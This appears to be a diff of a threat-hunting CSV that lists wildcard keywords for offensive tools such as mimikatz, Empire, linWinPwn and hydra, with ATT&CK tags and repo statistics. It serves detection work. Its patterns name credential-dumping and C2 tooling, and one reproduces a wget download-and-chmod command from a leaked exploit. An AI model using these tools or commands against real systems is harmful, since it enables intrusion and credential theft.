T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*--user orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z"
-"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*--user_file*--password_file*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
-"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
-"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
 "*UserEnum*","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","209","45","2018-06-03T19:08:37Z","2018-05-21T16:55:58Z"
 "*UserHunterImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*username-anarchy *","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z"
-"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
-"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
 "*users/public/troubleshooting_log.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
-"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
 "*users\public\example.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z"
 "*users\public\temp.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z"
 "*users_asreproast.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*users_dcsrp_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*users_kerberoasting.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
-"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*users_no_req_pass.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*users_no_req_pass_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*usestager *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
@@ -18011,50 +18195,52 @@
 "*using NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z"
 "*using SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
 "*using SharpView.Enums*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z"
-"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
-"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
 "*UsoDllLoader*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z"
 "*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
 "*usr/share/seclists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*usr/src/rusthound rusthound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
-"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
-"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*utils/payloads.db*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","",""
 "*Utils\Posh.cs*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
-"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1341","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z"
-"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1342","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z"
+"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
 "*valid_user@contoso.com:Password1*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
-"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
